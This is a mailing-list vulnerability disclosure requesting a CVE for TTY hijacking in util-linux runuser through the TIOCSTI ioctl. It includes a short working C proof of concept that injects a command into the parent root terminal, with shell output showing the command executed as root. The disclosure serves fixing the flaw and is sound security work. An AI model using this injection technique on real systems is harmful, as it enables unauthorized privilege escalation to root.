oss-sec mailing list archives

CVE Request: util-linux runuser tty hijacking via TIOCSTI ioctl

From: up201407890 () alunos dcc fc up pt
Date: Fri, 26 Feb 2016 15:54:16 +0100

This is a similar issue to the one I posted yesterday on oss-sec, butto runuser(1) from util-linux, which can only be run as root for thepurpose of executing programs as another user.


https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=815922

When executing a program via "runuser -u nonpriv program" the
nonpriv session can
escape to the parent session by using the TIOCSTI ioctl to push
characters into the
terminal's input buffer, allowing privilege escalation.
This issue has been fixed in "su" by calling setsid() and in "sudo" by
using the "use_pty" flag

# cat test.c
#include <sys/ioctl.h>

int main()
{
char *cmd = "id\n";
while(*cmd)
ioctl(0, TIOCSTI, cmd++);
}

# gcc test.c -o test
# id saken
uid=1000(saken) gid=1000(saken) groups=1000(saken)

# runuser -u saken ./test ---> last command i type in
id
# id ---> did not type this
uid=0(root) gid=0(root) groups=0(root)


I'd like to request a CVE for this issue.

Thanks,
Federico Bento

----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.

Current thread:

CVE Request: util-linux runuser tty hijacking via TIOCSTI ioctl up201407890 (Feb 26)
- Re: CVE Request: util-linux runuser tty hijacking via TIOCSTI ioctl cve-assign (Feb 27)
  - Re: Re: CVE Request: util-linux runuser tty hijacking via TIOCSTI ioctl Alexander E. Patrakov (Feb 28)
    - Re: CVE Request: util-linux runuser tty hijacking via TIOCSTI ioctl -- chroot cve-assign (Feb 28)